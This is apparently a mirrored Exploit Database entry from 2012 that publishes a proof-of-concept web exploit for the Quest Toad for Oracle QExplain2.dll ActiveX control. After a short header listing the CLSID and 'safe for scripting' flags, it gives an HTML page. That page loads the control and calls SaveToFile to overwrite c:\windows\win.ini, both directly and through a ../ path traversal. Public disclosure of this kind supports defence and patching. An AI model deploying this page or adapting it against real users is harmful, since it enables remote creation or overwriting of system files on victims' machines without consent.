Quest Toad for Oracle Explain Plan Display ActiveX Control – ‘QExplain2.dll 6.6.1.1115’ Remote File Creation / Overwrite

• Exploit Database
• 17 阅读

• 作者： rgod
  日期： 2012-04-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18703/

• <!-- 
  Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
  Remote File Creation / Overwrite 
  
  vendor site: http://www.quest.com/
  file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe
  
  CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
  Progid: QExplain2.ExplainPlanDisplayX
  Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
  Implements IObjectSafety: True
  Safe For Initialization (IObjectSafety): True
  Safe For Scripting (IObjectSafety): True
  
  rgod
  -->
  <!-- saved from url=(0014)about:internet --> 
  <html>
  <object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />
  </object>
  <script>
  try{
  obj.SaveToFile("c:\\windows\\win.ini");
  }catch(e){
  }
  
  try{
  obj.SaveToFile("../../../../../../../../../../windows/win.ini");
  }catch(e){
  }
  </script>